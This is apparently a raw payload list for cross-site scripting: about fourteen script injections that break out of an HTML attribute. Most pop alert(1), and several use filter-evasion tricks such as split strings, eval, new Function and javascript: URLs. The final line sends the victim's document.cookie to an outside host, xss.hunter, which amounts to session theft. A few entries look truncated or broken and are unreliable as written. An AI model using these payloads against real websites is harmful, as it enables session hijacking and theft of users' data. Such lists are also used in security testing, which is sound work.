"><div id=xss>"><script>document.getElementById('xss').innerHTML='<img src=x onerror=alert(1)>'</script>
"><script>document.write('<img src=x onerror=alert(1)>')</script>
"><script>eval('ale'+'rt(1)')</script>
"><script>setTimeout('ale'+'rt(1)',0)</script>
"><script>location='javascript:alert(1)'</script>
"><script>window.location='javascript:alert(1)'</script>
"><script>top.location='javascript:alert(1)'</script>
"><script>document.body.innerHTML='<svg/onload=alert(1)>'</script>
"><script>let x='alert';this</script>
"><script>new Function('ale'+'rt(1)')()</script>
"><script>window</script>
"><script>top</script>
"><script>window.onerror=alert;throw 'DOMXSS'</script>
"><script>fetch('https://xss.hunter/?dom='+document.cookie)</script>
